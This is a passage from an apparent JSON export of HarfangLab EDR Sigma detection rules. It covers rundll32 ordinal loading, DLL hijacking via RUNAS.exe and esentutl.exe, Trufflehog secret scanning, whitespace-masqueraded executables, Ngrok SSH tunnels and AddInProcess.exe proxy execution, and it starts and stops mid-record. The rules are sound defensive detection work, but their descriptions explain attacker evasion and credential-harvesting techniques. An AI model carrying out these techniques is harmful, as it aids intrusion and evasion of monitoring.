Cam Video IM Pro #7'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\IBM\\RationalSDLC\\ClearCase\\bin\\cc.cpl,ClearCase'\n - '*RunDLL32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpinksts????.dll,RunDLLEntry*'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Windows\\SysWOW64\\\\*.cpl,*'\n - '?:\\Windows\\system32\\rundll32.exe portabledeviceapi.dll,#1'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\ntmaes\\cbase.cpl,*'\n\n exclusion_office:\n # C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\shell32.dll,#44 C:\\PROGRA~2\\MICROS~1\\Office16\\MLCFG32.CPL,@0\n CommandLine|contains|all:\n - '?:\\Windows\\SysWOW64\\shell32.dll'\n - '#44'\n - '\\Office1?\\MLCFG32.CPL'\n\n exclusion_uxtheme:\n # rundll32.exe uxtheme.dll,#64 C:\\Windows\\resources\\Themes\\Aero\\Aero.msstyles?NormalColor?NormalSize\n # rundll32.exe uxtheme.dll,#64 C:\\windows\\resources\\themes\\Aero\\AeroLite.msstyles?NormalColor?NormalSize\n CommandLine|contains|all:\n - 'uxtheme.dll'\n - '#64'\n - '?:\\Windows\\resources\\Themes\\Aero\\Aero'\n\n exclusion_nvidia:\n # C:\\WINDOWS\\system32\\rundll32.exe C:\\Program Files\\NVIDIA Corporation\\ShadowPlay\\nvspapi64.dll #14 4560 -org=Unknown\n # C:\\Windows\\system32\\rundll32.exe C:\\Program Files\\NVIDIA Corporation\\ShadowPlay\\nvspapi64.dll #15 2824 -org=ServiceRestart\n # C:\\WINDOWS\\system32\\rundll32.exe C:\\Program Files\\NVIDIA Corporation\\ShadowPlay\\nvspapi64.dll #13 21404 -org=DriverReload\n # C:\\WINDOWS\\system32\\rundll32.exe C:\\Program Files\\NVIDIA Corporation\\NVIDIA App\\ShadowPlay\\nvspapi64.dll #14 12116 -org=Unknown\n # C:\\WINDOWS\\system32\\rundll32.exe C:\\WINDOWS\\system32\\nvspcap64.dll #14 4180\n CommandLine:\n - '*:\\Program Files\\NVIDIA Corporation\\ShadowPlay\\nvspapi64.dll*'\n - '*:\\Program Files\\NVIDIA Corporation\\NVIDIA 
App\\ShadowPlay\\nvspapi64.dll*'\n - '*:\\WINDOWS\\system32\\nvspcap64.dll*'\n CommandLine|contains:\n - '#13'\n - '#14'\n - '#15'\n\n exclusion_seagull:\n # rundll32 C:\\windows\\system32\\spool\\DRIVERS\\x64\\3\\ssnetmon.d64,StatusMonitor init TOSHIBA B-EX4T1-G #2 -i\n # rundll32 C:\\windows\\system32\\spool\\DRIVERS\\x64\\3\\ssnetmon.d64,StatusMonitor init Datamax-O'Neil E-4205A Mark III #2 -i\n CommandLine|contains: '?:\\windows\\system32\\spool\\DRIVERS\\x64\\3\\ssnetmon.d64,StatusMonitor init'\n ParentImage: '?:\\Windows\\ssdal.exe'\n\n exclusion_hotplug_saferemove:\n # C:\\windows\\System32\\RunDll32.exe C:\\windows\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification #OMNICANAL (F:)\n CommandLine|contains: '?:\\windows\\System32\\RunDll32.exe ?:\\windows\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification'\n\n exclusion_ibm_iaccess:\n # C:\\windows\\SysWOW64\\rundll32.exe C:\\windows\\SysWOW64\\shell32.dll,#44 C:\\windows\\SysWOW64\\ca400cpl.cpl,IBM i Access for Windows\n # C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\shell32.dll,#44 C:\\Windows\\SysWOW64\\ca400cpl.cpl,\n CommandLine|contains: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Windows\\SysWOW64\\ca400cpl.cpl,'\n\n exclusion_sage_installation:\n # C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\shell32.dll,#44 C:\\Program Files (x86)\\Common Files\\Sage\\cbinst32.cpl,Sage Installation\n CommandLine|contains: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\Common Files\\Sage\\cbinst32.cpl,'\n\n exclusion_fasttrack_software:\n # rundll32.exe C:\\ProgramData\\FastTrack Software\\Admin By Request\\ShellHelper32.dll,#1\n # rundll32.exe C:\\ProgramData\\FastTrack Software\\Admin By Request\\ShellHelper64.dll,#1\n CommandLine|contains:\n - 'rundll32.exe ?:\\ProgramData\\FastTrack Software\\Admin By Request\\ShellHelper32.dll,#1'\n - 'rundll32.exe ?:\\ProgramData\\FastTrack 
Software\\Admin By Request\\ShellHelper64.dll,#1'\n\n exclusion_borland_bdeadmin:\n # child process is C:\\Program Files (x86)\\Common Files\\Borland Shared\\BDE\\BDEADMIN.EXE\n # C:\\Windows\\SysWOW64\\rundll32.exe C:\\Windows\\SysWOW64\\shell32.dll,#44 C:\\Windows\\SysWOW64\\BDEADMIN.CPL,Administrateur BDE\n CommandLine|contains: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 ?:\\Windows\\SysWOW64\\BDEADMIN.CPL,'\n\n exclusion_msbuild_filetracker:\n CommandLine:\n - 'rundll32.exe ?:\\Program Files (x86)\\MSBuild\\\\*\\FileTracker\\FileTracker32.dll,#1'\n - 'rundll32.exe ?:\\Program Files (x86)\\MSBuild\\\\*\\FileTracker\\FileTracker64.dll,#1'\n\n exclusion_xwaymgr:\n CommandLine:\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\shell32.dll,#44 xwaymgr.cpl'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\shell32.dll,#44 ?:\\WINDOWS\\SYSTEM32\\XWAYMGR.CPL'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\shell32.dll,#44 ?:\\Windows\\System32\\XWAYMgr.cpl,'\n\n exclusion_docrouter:\n CommandLine: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 *\\DocRouter\\DocRouterCfg.cpl,Inge-Com DocRouter'\n\n exclusion_faxslauncher:\n CommandLine: '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\SysWOW64\\shell32.dll,#44 *\\RightFax\\Shared Files\\FaxsLauncher.cpl,RightFax Server'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "69751146-8ab0-4b09-9bef-03ed928fc3f5",
"rule_name": "Suspicious DLL Loaded by Ordinal",
"rule_description": "Detects a suspicious execution of \"Rundll32.exe\" to load a DLL by specifying the function using an ordinal instead of a function name.\nThis can be used by attackers to evade command-line based detection.\nIt is recommended to investigate the DLL loaded by \"Rundll32.exe\" as well as the parent process for suspicious activities.\n",
"rule_creation_date": "2022-03-16",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "698ab38b-da07-4635-805e-dfbdaab8e6e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588496Z",
"creation_date": "2026-03-23T11:45:34.588501Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588513Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_runas.yml",
"content": "title: DLL Hijacking via RUNAS.exe\nid: 698ab38b-da07-4635-805e-dfbdaab8e6e7\ndescription: |\n Detects potential Windows DLL Hijacking via RUNAS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'RUNAS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\netutils.dll'\n - '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "698ab38b-da07-4635-805e-dfbdaab8e6e7",
"rule_name": "DLL Hijacking via RUNAS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via RUNAS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "69da9a0f-114f-4a09-afa3-1b7ade5b394d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070861Z",
"creation_date": "2026-03-23T11:45:34.070863Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070867Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/trufflesecurity/trufflehog",
"https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm",
"https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",
"https://attack.mitre.org/techniques/T1552/"
],
"name": "t1552_trufflehog_executed_linux.yml",
"content": "title: Trufflehog Executed (Linux)\nid: 69da9a0f-114f-4a09-afa3-1b7ade5b394d\ndescription: |\n Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\n This tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\n The Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\n It is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\nreferences:\n - https://github.com/trufflesecurity/trufflehog\n - https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm\n - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2025/11/26\nmodified: 2025/11/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.credential_access\n - attack.t1552\n - attack.collection\n - attack.t1213\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Trufflehog\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Collection\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/trufflehog'\n\n exclusion_commandline:\n CommandLine|contains: '/trufflehog filesystem --json --fail --only-verified --no-update '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "69da9a0f-114f-4a09-afa3-1b7ade5b394d",
"rule_name": "Trufflehog Executed (Linux)",
"rule_description": "Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\nThis tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\nThe Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\nIt is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\n",
"rule_creation_date": "2025-11-26",
"rule_modified_date": "2025-11-27",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083",
"attack.t1213",
"attack.t1552"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "69e19e89-cfed-45d8-a058-15df7559165b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086584Z",
"creation_date": "2026-03-23T11:45:34.086586Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086590Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_executable_with_spaces_before_extension.yml",
"content": "title: File with White Spaces Before its Extension Executed\nid: 69e19e89-cfed-45d8-a058-15df7559165b\ndescription: |\n Detects the execution of a suspicious file with a large number of white spaces before its extension.\n This is usually used to hide the file extension by pushing it outside of a default view in a files list window, so that a targeted user is tricked into opening an executable file.\n This technique is often leveraged to better masquerade an executable file as a document (eg. executable icon is set to the one of a PDF file, and/or a '.pdf' double file extension is added before several spaces and '.exe').\n It is recommended to check the binary for malicious content.\nreferences:\n - https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2021/05/04\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|re: '[\\s\\u2800]{5,260}\\.\\w{1,3}$'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "69e19e89-cfed-45d8-a058-15df7559165b",
"rule_name": "File with White Spaces Before its Extension Executed",
"rule_description": "Detects the execution of a suspicious file with a large number of white spaces before its extension.\nThis is usually used to hide the file extension by pushing it outside of the default view in a file list window, so that a targeted user is tricked into opening an executable file.\nThis technique is often leveraged to better masquerade an executable file as a document (e.g. the executable's icon is set to that of a PDF file, and/or a '.pdf' double file extension is added before several spaces and '.exe').\nIt is recommended to check the binary for malicious content.\n",
"rule_creation_date": "2021-05-04",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a020cdc-4611-49dd-a63a-88e40f6579fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094346Z",
"creation_date": "2026-03-23T11:45:34.094349Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094353Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/hakluke/status/1679023050526687244",
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/software/S0508/"
],
"name": "t1090_macos_ngrok_ssh.yml",
"content": "title: Ngrok Tunnel via SSH\nid: 6a020cdc-4611-49dd-a63a-88e40f6579fc\ndescription: |\n Detects an SSH command-line with the official Ngrok Tunnel Server URL.\n Ngrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\n It is recommended to identify the binary making the connection, the protocol used by the tunnel, the concerned users and what resources the attacker could have accessed through the tunnel.\nreferences:\n - https://twitter.com/hakluke/status/1679023050526687244\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/software/S0508/\ndate: 2023/07/13\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - attack.s0508\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Tunneling\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/ssh'\n CommandLine|contains:\n - 'tunnel.??.ngrok.com'\n - 'tunnel.ngrok.com'\n - '.ngrok-agent.com'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a020cdc-4611-49dd-a63a-88e40f6579fc",
"rule_name": "Ngrok Tunnel via SSH",
"rule_description": "Detects an SSH command-line with the official Ngrok Tunnel Server URL.\nNgrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt isn't necessary to download the Ngrok binary to use an Ngrok tunnel; this can be done by creating a reverse SSH tunnel to the Ngrok servers.\nIt is recommended to identify the binary making the connection, the protocol used by the tunnel, the users concerned and what resources the attacker could have accessed through the tunnel.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a1f9a20-f7c5-4819-915d-773afed71b8a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607610Z",
"creation_date": "2026-03-23T11:45:34.607613Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607621Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nettitude/Aladdin/tree/main",
"https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_addinprocess_exploit_named_pipe.yml",
"content": "title: AddInProcess.exe Code Execution Named Pipe Detected\nid: 6a1f9a20-f7c5-4819-915d-773afed71b8a\ndescription: |\n Detects the connection to the '32a91b0f-30cd-4c75-be79-ccbd6345de99' named pipe.\n This can be the result of attackers exploiting the 'AddInProcess.exe' .NET binary to execute code under legitimate processes to hide their traces.\n It is recommended to investigate the children of the process with the PID contained in the command-line or the 'AddInProcess.exe' process as well as the process that connected to the named pipe.\nreferences:\n - https://github.com/nettitude/Aladdin/tree/main\n - https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/09/05\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\32a91b0f-30cd-4c75-be79-ccbd6345de99'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a1f9a20-f7c5-4819-915d-773afed71b8a",
"rule_name": "AddInProcess.exe Code Execution Named Pipe Detected",
"rule_description": "Detects the connection to the '32a91b0f-30cd-4c75-be79-ccbd6345de99' named pipe.\nThis can be the result of attackers exploiting the 'AddInProcess.exe' .NET binary to execute code under legitimate processes to hide their traces.\nIt is recommended to investigate the children of the process with the PID contained in the command-line or the 'AddInProcess.exe' process as well as the process that connected to the named pipe.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a5b2e92-4ae7-429a-a460-e0b6432c749f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081219Z",
"creation_date": "2026-03-23T11:45:34.081221Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081225Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_esentutl.yml",
"content": "title: DLL Hijacking via esentutl.exe\nid: 6a5b2e92-4ae7-429a-a460-e0b6432c749f\ndescription: |\n Detects potential Windows DLL Hijacking via esentutl.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'esentutl.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ESENT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a5b2e92-4ae7-429a-a460-e0b6432c749f",
"rule_name": "DLL Hijacking via esentutl.exe",
"rule_description": "Detects potential Windows DLL Hijacking via esentutl.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a7426b7-86a4-4009-b5d8-bd78413a67e9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
